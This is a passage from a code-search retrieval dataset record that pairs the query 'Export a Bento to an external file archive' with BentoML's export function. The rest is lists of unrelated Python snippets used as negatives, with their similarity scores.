add_commands(no_prefix_commands, paginator)\n\n for page in paginator.pages:\n await ctx.send(page)",
"def list_tags():\n\n tags = Tag.query.all()\n return render_template('tags/list_tags.html', tags=tags)",
"def get(self):\n bots = []\n whitelist = ndb.Key('BotWhitelist', WHITELIST_KEY).get()\n if whitelist:\n bots = whitelist.bots\n self.RenderHtml('bot_whitelist.html', {'bot_whitelist': '\\n'.join(bots)})",
"def list(cls, context, filters=None, limit=3000, marker=1,\n sort_key='id', sort_dir='asc'):\n db_boars = cls.dbapi.get_boar_list(\n context, limit=limit, marker=marker, sort_key=sort_key,\n sort_dir=sort_dir, filters=filters)\n\n #import pdb; pdb.set_trace()\n return [Boar._from_db_object(cls(context), obj) for obj in db_boars]",
"def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output",
"def filter_list(client, args):\n from ..util import print_query\n print_query(client.context.query)",
"def devlist_handler(userdata, *args):\n\t\tfor (dev, connected) in database.devlist(userdata[\"cursor\"]):\n\t\t\tif dev == \"devmaster\":\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif connected:\n\t\t\t\tprint(shlex.quote(\"+\" + dev), end=\" \")\n\t\t\telse:\n\t\t\t\tprint(shlex.quote(\"-\" + dev), end=\" \")\n\t\t\n\t\tprint()",
"def get_volume_list():\n return parse_list_output(Popen('cinder list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])",
"async def slashtag_list(self, ctx: commands.Context):\n tags = self.guild_tag_cache[ctx.guild.id]\n if not tags:\n return await ctx.send(\"There are no slash tags on this server.\")\n await self.view_slash_tags(ctx, tags, is_global=False)",
"async def list(self, ctx):\n message = '\\n'.join(sorted(self.etrigs['etrigs'].keys(), key=str.lower))\n message = '```http\\n{}\\n```'.format(message)\n await ctx.send(message)",
"def show():\n conn = sqlite3.connect(\"lite.db\")\n cursor = conn.cursor()\n\n # Query to display all records from the db\n cursor.execute(\"SELECT * from store\")\n\n # Fetch this data\n rows = cursor.fetchall()\n\n conn.close()\n\n return rows",
"def list(refresh):\n # This works too, but is much slower:\n # ogrinfo WFS:http://openmaps.gov.bc.ca/geo/ows?VERSION=1.1.0\n for table in bcdata.list_tables(refresh):\n click.echo(table)",
"def command_list(self, query):\n return query",
"def list(ctx, show_hidden, oath_type, period):\n ensure_validated(ctx)\n controller = ctx.obj['controller']\n creds = [cred\n for cred in controller.list()\n if show_hidden or not cred.is_hidden\n ]\n creds.sort()\n for cred in creds:\n click.echo(cred.printable_key, nl=False)\n if oath_type:\n click.echo(u', {}'.format(cred.oath_type.name), nl=False)\n if period:\n click.echo(', {}'.format(cred.period), nl=False)\n click.echo()",
"def revision_list():\n for rev in orm.DataRevision.select():\n click.echo(rev.name)",
"def fetch_browse_list_contents (self):\n response = self._session_get(component='browse')\n return BeautifulSoup(response.text, 'html.parser')",
"async def getList(author, page):\n availableCommands = await _generateList(author, False)\n availableCommands.sort(key=lambda x: x['name'])\n totalPages = math.floor(len(availableCommands)/10) + 1\n if page == 100:\n page = totalPages\n if page > totalPages or page < 1:\n return False\n availableCommands = availableCommands[(page-1)*10:(page)*10]\n return assembleEmbed(\n title=f\"List of Commands for `{author}` (Page {page}/{totalPages})\",\n desc=\"\\n\".join([f\"`{c['name']}` - {c['description']}\" for c in availableCommands])\n )",
"async def statusinfo(self, astable):\n cmd = subprocess.check_output([\"birdc\", \"show\", \"proto\", \"all\", str(astable)])\n for page in chat_formatting.pagify(cmd.decode(), ['\\n', ' '], shorten_by=12):\n await self.bot.say(chat_formatting.box(page))",
"def list_contents(self, show_hidden: bool = False):\n directories = []\n files = []\n if show_hidden:\n directories.extend([\".\", \"..\"])\n for entry in self.get_entries():\n if not entry.is_hidden() or show_hidden:\n if isinstance(entry, SaveFile):\n files.append(entry.get_bytes())\n elif isinstance(entry, Directory):\n directories.append(entry.get_name())\n elif isinstance(entry, NormalFile):\n files.append(entry.get_name())\n return \"\\n\".join(directories + files)"
] | [
"0.6460789",
"0.609852",
"0.605642",
"0.60312444",
"0.5958324",
"0.58794826",
"0.58415896",
"0.5798007",
"0.57732534",
"0.5748135",
"0.5748135",
"0.5723663",
"0.57183725",
"0.57072484",
"0.568819",
"0.56753975",
"0.5644786",
"0.56367767",
"0.5634464",
"0.5600329",
"0.55807924",
"0.55764073",
"0.55742526",
"0.5569244",
"0.5554157",
"0.5543209",
"0.55427235",
"0.55304193",
"0.550797",
"0.5504177",
"0.54993236",
"0.5497197",
"0.54932976",
"0.5476266",
"0.5470888",
"0.54633945",
"0.54630065",
"0.5430105",
"0.54295635",
"0.5424926",
"0.54076475",
"0.54075795",
"0.5407418",
"0.5403061",
"0.5400699",
"0.5386188",
"0.53672916",
"0.53628457",
"0.5358894",
"0.5344667",
"0.5344029",
"0.53436214",
"0.5341648",
"0.5337106",
"0.53304726",
"0.5329493",
"0.5328525",
"0.5325903",
"0.5320613",
"0.53116494",
"0.5304739",
"0.52994716",
"0.528599",
"0.5283532",
"0.527208",
"0.52693814",
"0.52524954",
"0.5250811",
"0.52428025",
"0.5223776",
"0.5222837",
"0.52153856",
"0.5211978",
"0.5209869",
"0.5205011",
"0.5202621",
"0.5199694",
"0.5198853",
"0.5193965",
"0.5193884",
"0.51927215",
"0.5191535",
"0.51910836",
"0.51822585",
"0.5182114",
"0.5177651",
"0.5177442",
"0.51725256",
"0.5165793",
"0.5158005",
"0.514929",
"0.51490307",
"0.51468825",
"0.51445866",
"0.51444995",
"0.51434624",
"0.51367456",
"0.5134298",
"0.51295584",
"0.511541"
] | 0.66813993 | 0 |
Delete Bento in local bento store. \b | def delete(delete_targets: list[str], yes: bool) -> None: # type: ignore (not accessed)
def delete_target(target: str) -> None:
tag = Tag.from_str(target)
if tag.version is None:
to_delete_bentos = bento_store.list(target)
else:
to_delete_bentos = [bento_store.get(tag)]
for bento in to_delete_bentos:
if yes:
delete_confirmed = True
else:
delete_confirmed = click.confirm(f"delete bento {bento.tag}?")
if delete_confirmed:
bento_store.delete(bento.tag)
logger.info("%s deleted.", bento)
for target in delete_targets:
delete_target(target) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def delete(self):\n self.storage.delete(basket=self)\n self.uncache()\n self._data = None\n self.dirty = False",
"def dangerously_delete(self, bento_name, bento_version):",
"def delete(self):\n\n lod_history = self.repo._get_lod_history(self.lod)\n assert lod_history.exists()\n lod_history.update(self.repo._youngest, None)\n self._mark_deleted()",
"def delete():",
"def _delete_from_db(self):\r\n if not self._created:\r\n return\r\n\r\n tdb.del_thing(self._type_id, self._id)\r\n cache.delete(thing_prefix(self.__class__.__name__, self._id))",
"def delete(self):\n pass",
"def delete(self):\n pass",
"def delete(self):\n pass",
"def delete(self):\n pass",
"def delete(self):\n ...",
"def delete(self, obj):",
"def delete(self):\n self.current_revision.delete()",
"def delete(self):\n self.dbm().model_delete(self)",
"def delete(self):\n self.data = None",
"def __delete__(self):\n pass",
"def delete(self):\r\n s = self.get_session()\r\n s.delete(self)\r\n s.commit()",
"def do_destroy(self, arg):\n obj = self.verify(arg, 2)\n if obj:\n del storage.all()[obj]\n storage.save()",
"def delete_leader(self):",
"def delete(ctx):\n click.echo('deleting')\n ctx.delete()\n click.echo('done')",
"def delete(self, obj=None):\n pass",
"def wipe():\n\tdb.session.query(Target).delete()\n\tdb.session.commit()",
"def model_delete(self, db):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n if Model.data_connector:\n with Model.data_connector.u_lock:\n Model.data_connector.remove_object(self)",
"def test_delete(self):\n c = city.City(name=\"Freiburg\")\n p1 = city.Citizen(name=\"Peter\")\n p2 = city.Citizen(name=\"Georg\")\n p3 = city.Citizen(name=\"Hans\")\n c.add(p1, p2, p3, rel=city.hasInhabitant)\n\n with DataspaceSession(URI) as session:\n wrapper = city.CityWrapper(session=session)\n cw = wrapper.add(c)\n session.commit()\n\n cw.remove(p3.uid)\n session.prune()\n session.commit()\n\n check_state(self, c, p1, p2, db=DB)",
"def src_delete(state):\n _lib.src_delete(state)",
"def after_delete(self, obj, st):\n pass",
"def delete(self):\n self.manager.delete(self.name)",
"def delete(self):\n self.manager.delete(self.name)",
"def delete(self) -> None:\n self.pop()",
"def delete_command():\n global selected_tuple\n backend.delete(selected_tuple[0])",
"def delete(self):\n raise NotImplementedError",
"def delete(self):\r\n db.session.delete(self)\r\n db.session.commit()",
"def __del__(self) -> None:\n self.map.ent_id.discard(self.id)",
"def delete(self):\n self.id = uuid4()\n DataStore.remove_instance(self)",
"def __del__(self):\n self.evaler.db.flush()",
"def delete(self):\n del self.shx.atoms[self.index]",
"def delete(self):\n self.package = None",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def __del__(self):\r\n self.save()\r\n self.close()",
"def delete(self):\n\n del self.parent_mirror_dir[self.cvs_path]",
"def delete(self, obj=None):\n if not obj:\n return\n key = \"{}.{}\".format(type(obj).__name__, obj.id)\n if key in self.__objects:\n del self.__objects[key]\n self.save()",
"def __delitem__(self, key):\n with SessionContext(self.SessionClass) as session:\n q = session.query(PAW2_DBObject)\n q = q.filter(PAW2_DBObject.key == key)\n assert q.delete(synchronize_session=False) == 1\n session.commit()",
"def delete(self, box):\n boom = box.GetSelection()\n if boom == box.GetRootItem():\n return\n\n item_data = box.GetItemData(boom).GetData()\n\n if isinstance(item_data, data_types.ProductData):\n boom = box.GetItemParent(boom)\n item_data = box.GetItemData(boom).GetData()\n\n db = database.TransactionsDB()\n\n if box is self.list_sales:\n func = db.delete_sale\n sale.update_inventory(item_data, undo=True)\n elif box is self.list_expenses:\n func = db.delete_expense\n else:\n func = db.delete_waste\n waste.update_inventory(item_data, undo=True)\n\n func(item_data.ID)\n\n db.close()\n self.setup(None)",
"def tearDown(self) -> None:\n place = storage.get(Place, self.place_id)\n if place is not None:\n storage.delete(place)\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()",
"def tearDown(self) -> None:\n place = storage.get(Place, self.place_id)\n if place is not None:\n storage.delete(place)\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()",
"def hdel(self):\n return self.delete()",
"def delete(self, obj):\n raise NotImplementedError",
"def delete(self):\n self.read = False\n self.write = False\n self.save()",
"def delete(self):\n self.manager.delete(self)",
"def _post_delete(self, instance, **kwargs):\n pk_name = instance._meta.pk.name\n for key in self.cache_fields:\n if key in ('pk', pk_name):\n continue\n # remove pointers\n cache.delete(self._get_from_cache_key(**{key: getattr(instance, key)}))\n # remove actual object\n cache.delete(self._get_from_cache_key(**{pk_name: instance.pk}))",
"def do_command(self, args):\n compops = dbops.Completions()\n compops.delete(args)",
"def tearDown(self) -> None:\n storage.delete(self.place)\n storage.delete(self.user)\n storage.delete(self.city)\n storage.delete(self.state)\n storage.save()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def __del__(self):\n print(f\"{self.fullname()} deleted from database.\")",
"def done(self):\n\t\tdef txn():\n\t\t\tother = db.get(self.key())\n\t\t\tif other and other.eta == self.eta:\n\t\t\t\tother.delete()\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\treturn db.run_in_transaction(txn)",
"def delete_obj(obj):\n Session.delete(obj)\n Session.flush()\n Session.commit()",
"def svn_fs_delete_berkeley(*args):\r\n return _fs.svn_fs_delete_berkeley(*args)",
"def rm(self, *args, **kwargs):\n return self.unload(*args, **kwargs)",
"def destroy(self):",
"def destroy(self):",
"def destroy(self):",
"def processDeleteCommand(self, objId):\n editor = self._parent\n obj = editor.findWithUUID(objId)\n if obj:\n print(\"DELETE FOR\",objId)\n # delete from object cache\n if objId in editor._total['objects']:\n del editor._total['objects'][objId]\n # clear uuid\n obj.opensim.uuid = \"\"\n scene = editor.get_current_scene()\n # unlink\n scene.objects.unlink(obj)\n editor.queueRedraw()",
"def remove(self):\r\n\t\tself._delete()",
"def delete_order():",
"def remove_data(self):\n db.session.delete(self)\n db.session.commit( )",
"def delete_from_db(self):\n db.session.delete(self)\n db.session.commit()",
"def delete_from_db(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []",
"def current_remove(self):\n storage.close()",
"def delete_item(self):\n\n\t\tdb.session.delete(self)\n\t\tdb.session.commit()",
"def __delete__(self, obj):\n self._instances.pop(obj, None)",
"def test_data_object_untrash(self):\n pass",
"def drop(self):\n self.id = None",
"def deleteBall(self):\n self._ball = None",
"def delete(self):\n\n raise NotImplementedError()",
"def test_heads_delitem_pass(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n del heads[\"branch\"]\n assert \"branch\" not in heads",
"def delete(self):\r\n self.domain.delete_item(self)",
"def __del__(self) -> None:\n self.delete()",
"def delete(self):\n raise NotImplementedError()",
"def delete(self):\n raise NotImplementedError()",
"def before_delete(self, obj, st):\n pass",
"def __del__(self) -> None:\n if hasattr(self, \"model\") and hasattr(self, \"_destruct\"):\n self._destruct(self.model)",
"def func(self):\n\n self.caller.execute_cmd('@del ' + self.caller.db.fbat + '-' + self.caller.db.lbat)\n\n #self.caller.msg(\"Command called!\")",
"def delete(self):\n if not self.is_deleted:\n self.is_deleted = True\n self.save()",
"def delete(self):\n return self.manager.delete(self)"
] | [
"0.7051506",
"0.68354255",
"0.680618",
"0.64838576",
"0.64788866",
"0.6383846",
"0.6383846",
"0.6383846",
"0.6383846",
"0.637536",
"0.63332254",
"0.6227315",
"0.61815846",
"0.6153086",
"0.6130447",
"0.61282235",
"0.6125379",
"0.6116602",
"0.6077102",
"0.60508895",
"0.6031658",
"0.6025468",
"0.60040647",
"0.59909344",
"0.5989163",
"0.59889525",
"0.5967301",
"0.5967301",
"0.59635353",
"0.59553885",
"0.5950985",
"0.5940412",
"0.5938346",
"0.5934857",
"0.5934752",
"0.5931889",
"0.59244204",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59039587",
"0.5903605",
"0.5897541",
"0.5897235",
"0.58945966",
"0.58934915",
"0.58934915",
"0.5891001",
"0.5886444",
"0.58826756",
"0.5878675",
"0.58736813",
"0.58594215",
"0.58519155",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.58442944",
"0.5843443",
"0.58417416",
"0.58336276",
"0.582947",
"0.58235586",
"0.58235586",
"0.58235586",
"0.5822185",
"0.58186907",
"0.5816163",
"0.58144146",
"0.5809263",
"0.5809263",
"0.58072317",
"0.5805331",
"0.5797819",
"0.5797092",
"0.57955664",
"0.5795496",
"0.5794935",
"0.5786463",
"0.57848495",
"0.57813334",
"0.57792926",
"0.577909",
"0.577909",
"0.57715803",
"0.57562584",
"0.5752619",
"0.57510054",
"0.57412195"
] | 0.0 | -1 |
Export a Bento to an external file archive \b | def export(bento_tag: str, out_path: str) -> None: # type: ignore (not accessed)
bento = bento_store.get(bento_tag)
out_path = bento.export(out_path)
logger.info("%s exported to %s.", bento, out_path) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def archive(po_filename, bl_filename):\n\n # Store archive in same dir as this script\n root = os.path.abspath(os.path.dirname(sys.argv[0]))\n\n po_archive = root + '/po.csv.%s' % datetime.date.today()\n bl_archive = root + '/bl.csv.%s' % datetime.date.today()\n\n shutil.move(po_filename, po_archive)\n shutil.move(bl_filename, bl_archive)\n\n perms = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH\n os.chmod(po_archive, perms)\n os.chmod(bl_archive, perms)",
"def _toFile(self):\n pass",
"def export_to_file(self):\r\n return True",
"def save(self, export_path: str):",
"def test_export(self):\n structure = {\n \"README.rst\": \"Hi this is 1.0.0.\",\n \"twisted\": {\n \"newsfragments\": {\"README\": \"Hi this is 1.0.0\"},\n \"_version.py\": genVersion(\"twisted\", 1, 0, 0),\n \"web\": {\n \"newsfragments\": {\"README\": \"Hi this is 1.0.0\"},\n \"_version.py\": genVersion(\"twisted.web\", 1, 0, 0),\n },\n },\n }\n reposDir = self.makeRepository(self.tmpDir)\n self.createStructure(reposDir, structure)\n self.commitRepository(reposDir)\n\n exportDir = FilePath(self.mktemp()).child(\"export\")\n self.createCommand.exportTo(reposDir, exportDir)\n self.assertStructure(exportDir, structure)",
"def BT_export(self):\n src = os.path.join(self.resMan.base_path, Config.instance().weld_BT_root_folder)\n srcs=self.BTMan.get_subdirs(src)\n dst = os.path.join(self.project.rootdir, Config.instance().weld_BT_root_folder)\n #this operation has lots of exceptions to output...\n try:\n for src in srcs:\n self.BTMan.export(src, dst)\n except Exception, e:\n print >> sys.__stderr, 'ERROR in Weld.BT_export():'\n print >> sys.__stderr, e.args[0]\n print >> sys.__stderr, 'export cancelled (some cleanup might be needed in %s)' % dst",
"def wrapped_tarball(export_context, context):\n result = export_result_dict(export_context)\n RESPONSE = context.REQUEST.RESPONSE\n RESPONSE.setHeader('Content-type', 'application/x-gzip')\n RESPONSE.setHeader('Content-disposition',\n 'attachment; filename=%s' % result['filename'])\n return result['tarball']",
"def exportBulletFile(*argv):",
"def export_samfile(self):",
"def archive(mongo_backup_file):\r\n filename = get_archive_filename()\r\n tar = tarfile.open(filename, \"w|gz\")\r\n tar.add(mongo_backup_file)\r\n tar.close()\r\n\r\n return filename",
"def export(self, stream):\n pass",
"def saveto(file, tmpfile):\n args = {\"file\": file, \"tmpfile\": tmpfile}\n send_command(\"saveto\", args)",
"def _export_bh_(cls, self):",
"def _export_button_cb(self):\n filename = asksaveasfile(\n mode='w',\n filetypes=(('YAML files', '*.yaml'), ('All files', '*.*'))\n )\n\n if not filename:\n return\n\n with open(filename.name, 'w') as f:\n f.write('obstacles:\\n')\n for obstacle in self.obstacles:\n f.write(f' - {str(obstacle)}')\n f.write('\\n')",
"def extract_to_disk(self):\n archive_name, extension = os.path.splitext(os.path.basename(self.file.name))\n if not os.path.isdir(os.path.join(os.getcwd(), archive_name)):\n os.mkdir(archive_name)\n os.chdir(archive_name)\n for filename, data in self.extract().items():\n f = open(filename, 'wb')\n f.write(data or b'')\n f.close()",
"def save_as_archive(self):\n dest_file_path = QFileDialog.getSaveFileName(self)[0]\n self.binder.to_archive(dest_file_path)",
"def archive(self, header, target: str, output_target: str = None):\n\t\ttry:\n\t\t\ttarget = os.path.abspath(target)\n\t\t\tif output_target:\n\t\t\t\toutfile = output_target\n\t\t\telse:\n\t\t\t\tif os.path.isfile(target):\n\t\t\t\t\toutfile = target + \".edz\"\n\t\t\t\telif os.path.isdir(target):\n\t\t\t\t\toutfile = os.path.join(target, os.path.basename(target) + \".edz\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No valid output target\")\n\t\t\t\t\treturn\n\t\t\t#Zip target dir\n\t\t\tprint(f\"Creating virtual zip of {target}\")\n\t\t\tzip_bytes_object = zipit(target)\n\t\t\tprint(f\"Making .edz at {outfile}...\")\n\t\t\twith open(outfile, \"w+b\") as out:\n\t\t\t\tprint(\"Writing header...\")\n\t\t\t\tout.write(header)\n\t\t\t\tprint(\"Writing zip contents...\")\n\t\t\t\tout.write(zip_bytes_object.getvalue())\n\t\t\tprint(\"Success!\")\n\t\t\treturn outfile\n\t\texcept Exception as e:\n\t\t\tprint(f\"Failed to create edizip from target {target} - {e}\")\n\t\t\tprint(\"Attempting cleanup...\")\n\t\t\ttry:\n\t\t\t\tif os.path.isfile(outfile):\n\t\t\t\t\tprint(f\"Removing possibly invalid archive {outfile}\")\n\t\t\t\t\tos.remove(outfile)\n\t\t\texcept:\n\t\t\t\tpass",
"def make_file(self):\n\n f = open(get_output_path(), \"w\")\n \n f.write(self.export())\n \n f.close()\n\n return self",
"def export(self, token):\n studio_module = request.env['ir.module.module'].get_studio_module()\n data = request.env['ir.model.data'].search([('studio', '=', True)])\n content = export.generate_archive(studio_module, data)\n\n return request.make_response(content, headers=[\n ('Content-Disposition', content_disposition('customizations.zip')),\n ('Content-Type', 'application/zip'),\n ('Content-Length', len(content)),\n ], cookies={'fileToken': token})",
"def to_walden(self):\n with tempfile.NamedTemporaryFile() as f:\n # fetch the file locally\n files.download(self.source_data_url, f.name)\n\n # add it to walden, both locally, and to our remote file cache\n add_to_catalog(self.metadata, f.name, upload=True)",
"def __export_file(self, filename, output):\n outfile = open(filename, \"w\")\n outfile.write(output)\n outfile.close\n print(\"Output written to file: \" + filename + \"\\n\")",
"def test_export(api):\n # upload file to file.io servers\n uploaded_file = api.upload(\n tag='test_file',\n expiry='1d',\n path='tests/test_file.txt'\n )\n\n # check that instance of FileIO has these fields\n assert uploaded_file.link\n assert uploaded_file.key\n assert uploaded_file.tag\n assert uploaded_file.path\n\n # check that the uploaded file was added to uploaded files list\n assert api.show_uploads()\n\n # testing that export works\n api.export('tests/files_data.json')\n\n # check that the exported file exists\n assert path.isfile('tests/files_data.json')\n\n remove('tests/files_data.json')\n\n # testing that export in pkl works\n api.export(out_type='pkl')\n\n # check that the exported file exists\n assert path.isfile('exported.pkl')\n\n remove('exported.pkl')\n\n # testong that export in pkl works\n api.export('tests/exported.pkl')\n\n # check that the exported file exists\n assert path.isfile('tests/exported.pkl')\n\n remove('tests/exported.pkl')\n\n # testing that export in json with default path works\n api.export()\n\n # check that exported file exists\n assert path.isfile('exported.json')\n\n remove('exported.json')\n\n # check that export with provided path works\n api.export('tests/exporte.d.pkl', out_type='json')\n\n # testing that export works\n assert path.isfile('tests/exporte.d.pkl.json')\n\n remove('tests/exporte.d.pkl.json')\n\n # check that export works correctly with strange path\n api.export('tests/t.e.s.t.p.k.l', out_type='pkl')\n\n # testing that export works\n assert path.isfile('tests/t.e.s.t.p.k.l.pkl')\n\n remove('tests/t.e.s.t.p.k.l.pkl')",
"def _outside_tar2(self):\r\n outside_tar = self.unsafe_common_dir / \"unsafe_file.tar.gz\"\r\n with tarfile.open(outside_tar, \"w:gz\") as tar:\r\n tar.addfile(tarfile.TarInfo(str(self.unsafe_common_dir / \"../a_file\")))\r\n\r\n return outside_tar",
"def export_bom(self):\n path = self.export_dir.joinpath(self.partcode).joinpath('bom.xlsx')\n bom = self.doc.ComponentDefinition.BOM\n bom.StructuredViewFirstLevelOnly = False\n bom.StructuredViewEnabled = True\n bom.BOMViews.Item(\"Structured\").Export(path, 74498)",
"def transfer(file_obj):",
"def do_bagit_export(assets, export_base_dir, export_filename_base):\n\n # These assets should already be in the correct order - by item, seequence\n for asset in assets:\n asset_id = get_original_asset_id(asset.download_url)\n logger.debug(\"Exporting asset %s into %s\", asset_id, export_base_dir)\n\n asset_id = asset_id.replace(\":\", \"/\")\n asset_path, asset_filename = os.path.split(asset_id)\n\n asset_dest_path = os.path.join(export_base_dir, asset_path)\n os.makedirs(asset_dest_path, exist_ok=True)\n\n # Build a transcription output text file for each asset\n asset_text_output_path = os.path.join(\n asset_dest_path, \"%s.txt\" % asset_filename\n )\n\n if asset.latest_transcription:\n # Write the asset level transcription file\n with open(asset_text_output_path, \"w\") as f:\n f.write(asset.latest_transcription)\n\n write_distinct_asset_resource_file(assets, export_base_dir)\n\n # Turn Structure into bagit format\n bagit.make_bag(\n export_base_dir,\n {\n \"Content-Access\": \"web\",\n \"Content-Custodian\": \"dcms\",\n \"Content-Process\": \"crowdsourced\",\n \"Content-Type\": \"textual\",\n \"LC-Bag-Id\": export_filename_base,\n \"LC-Items\": \"%d transcriptions\" % len(assets),\n \"LC-Project\": \"gdccrowd\",\n \"License-Information\": \"Public domain\",\n },\n )\n\n # Build .zip file of bagit formatted Campaign Folder\n archive_name = export_base_dir\n shutil.make_archive(archive_name, \"zip\", export_base_dir)\n\n export_filename = \"%s.zip\" % export_filename_base\n\n # Upload zip to S3 bucket\n s3_bucket = getattr(settings, \"EXPORT_S3_BUCKET_NAME\", None)\n\n if s3_bucket:\n logger.debug(\"Uploading exported bag to S3 bucket %s\", s3_bucket)\n s3 = boto3.resource(\"s3\")\n s3.Bucket(s3_bucket).upload_file(\n \"%s.zip\" % export_base_dir, \"%s\" % export_filename\n )\n\n return HttpResponseRedirect(\n \"https://%s.s3.amazonaws.com/%s\" % (s3_bucket, export_filename)\n )\n else:\n # Download zip from local storage\n with open(\"%s.zip\" % export_base_dir, \"rb\") as zip_file:\n response = HttpResponse(zip_file, content_type=\"application/zip\")\n response[\"Content-Disposition\"] = \"attachment; filename=%s\" % export_filename\n return response",
"def savefile(self, x, o):\n self.sep('save')\n with open(o, 'w') as f:\n f.write(x)\n sys.exit('all done (%s bytes).. saved as %s' % (len(x), o))",
"def export(self):\n memento = self.create_memento()\n try:\n f = open(\"story.txt\", \"w\")\n try:\n f.write(memento.__str__())\n finally:\n f.close()\n except IOError:\n print 'IOError while exporting story!'",
"def export(fileName, result):\n with open(fileName, 'a') as output:\n output.write(result)",
"def saveAs( self, filename ):\r\n filename = uno.systemPathToFileUrl( os.path.abspath( filename ) )\r\n #filterlist: http://wiki.services.openoffice.org/wiki/Framework/Article/Filter/FilterList_OOo_3_0\r\n exportFilter = self._getExportFilter( filename )\r\n props = exportFilter, \r\n #storeToURL: #http://codesnippets.services.openoffice.org/Office/Office.ConvertDocuments.snip\r\n self.oodocument.storeToURL( filename, props )",
"def export(ctx):\n LOG.info(\"Running scout export\")",
"def master_archive(f, e):\n template = e.get_template(TEMPLATES['archive'])\n write_file(\"archives.html\", template.render(entries=f))",
"def exportData(self):\n self.fileName = QtGui.QFileDialog.getSaveFileName(self, self.tr(\"Save Data\"), \"\", \n self.tr('Atom Positions (*.pdb)'))\n if not self.fileName.isEmpty():\n self.setCursor(QtCore.Qt.WaitCursor)\n selectedChain = self.main_chain\n PDBstring = selectedChain.toPDB( CAlphaPlaceholders=False)\n F = open(self.fileName, 'w')\n F.write(PDBstring)\n F.close()\n self.dirty = False\n self.setCursor(QtCore.Qt.ArrowCursor)",
"def _decompress_tarball(*, in_fileobj, out_fileobj):\n with tarfile.open(fileobj=in_fileobj, mode=\"r\") as it, tarfile.open(\n fileobj=out_fileobj, mode=\"w|\"\n ) as ot:\n for member in it.getmembers():\n extracted = it.extractfile(member)\n ot.addfile(member, extracted)",
"def filemenu_Export(self):\n line_dict = {}\n for line in self.lines.values():\n for name, arr in line.to_mat().items():\n line_dict[name] = arr\n fileTypes = [(\"MATLAB file\",\"*.mat\"), (\"NumPy file\",\"*.npz\")]\n options = {}\n options['initialdir'] = os.path.expanduser('~')\n options['filetypes'] = fileTypes\n options['parent'] = self.master\n filename = filedialog.asksaveasfilename(**options)\n if filename:\n _, ext = os.path.splitext(filename)\n if ext == \".mat\":\n sio.savemat(filename, line_dict)\n elif ext == \".npz\":\n np.savez(filename, lines=line_dict)",
"def write_to_file_obj(self, dir, soup_obj):\n\t\tif not os.path.exists(dir):\n\t\t\twith open(dir, 'a') as f:\n\t\t\t\tfor obj in soup_obj:\n\t\t\t\t\t#print(verse.text)\n\t\t\t\t\tf.write(obj.text)\n\t\t\t\tf.write('\\n') # last line missing line break",
"def save(self, output, data):",
"def _outside_tar(self):\r\n outside_tar = self.unsafe_common_dir / \"unsafe_file.tar.gz\"\r\n with tarfile.open(outside_tar, \"w:gz\") as tar:\r\n tar.addfile(tarfile.TarInfo(str(self.content_dir / \"a_file\")))\r\n\r\n return outside_tar",
"def test_download_to_file(req, tmpdir):\n req.get(ENTREZ_URL, text='This works.')\n outdir = tmpdir.mkdir('outdir')\n filename = outdir.join('foo')\n expected = outdir.join('foo.gbk')\n config = core.Config(molecule='nucleotide', verbose=False)\n\n core.download_to_file('FOO', config, filename=filename)\n\n assert expected.check()",
"def write_object_file_to_file(self, file_name):\n with open(file_name, 'wb+') as file:\n file.write(self.object_file.to_binary_array())",
